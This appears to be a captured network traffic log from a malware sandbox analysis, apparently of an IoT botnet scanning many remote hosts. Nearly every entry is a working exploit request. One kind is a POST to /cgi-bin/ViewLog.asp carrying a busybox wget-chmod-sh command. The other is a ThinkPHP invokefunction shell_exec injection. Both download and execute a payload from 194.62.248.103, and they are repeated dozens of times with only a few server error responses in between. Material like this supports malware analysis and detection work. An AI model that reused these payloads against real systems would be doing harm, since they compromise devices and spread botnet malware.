                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:20.562294006 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:44.878778934 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        779192.168.2.2340834112.184.189.13880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:58.412776947 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:58.697586060 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:36:58 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        780192.168.2.2359814112.197.130.9980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:58.816340923 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:59.194982052 CEST339INHTTP/1.0 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 21:36:58 GMT
                                                        Server: Boa/0.94.14rc21
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        781192.168.2.233970031.136.4.1578080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:58.864353895 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:59.829072952 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:01.748723030 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:05.716156006 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:13.395097017 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:28.752968073 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:59.212879896 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        782192.168.2.236006094.123.141.2108080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:58.872695923 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        783192.168.2.234518494.123.20.2178080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:58.876665115 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        784192.168.2.234903494.120.175.2148080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:58.876919031 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        785192.168.2.234370695.131.77.358080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:58.882821083 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:59.235011101 CEST313INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 106
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        786192.168.2.2351626112.136.164.1080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:59.135521889 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:59.455702066 CEST201INHTTP/1.1 400 Invalid Request
                                                        Date: Sun, 14 Apr 2024 14:36:59 GMT
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 48 54 54 50 20 45 72 72 6f 72 3a 20 34 30 30 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a
                                                        Data Ascii: <HTML><HEAD></HEAD><BODY>HTTP Error: 400</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        787192.168.2.2351350112.49.30.16480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:59.260523081 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:59.817080975 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:01.140882969 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:03.924376965 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:09.299635887 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:19.794193983 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:40.783252954 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:38:23.785677910 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        788192.168.2.2352298112.185.195.20680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:59.410669088 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        789192.168.2.2348474112.173.115.25180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:59.418715000 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:00.884902000 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:02.612684011 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:06.228065968 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:13.139218092 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:26.961189032 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:55.117443085 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        790192.168.2.235230631.33.140.918080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:59.476232052 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:00.373034954 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:02.132916927 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        791192.168.2.234222495.248.145.838080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:59.509679079 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:59.850943089 CEST103INHTTP/1.1 404 Not Found
                                                        Content-Type: text/plain
                                                        Content-Length: 45
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        792192.168.2.233828495.140.17.1148080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:59.533740044 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
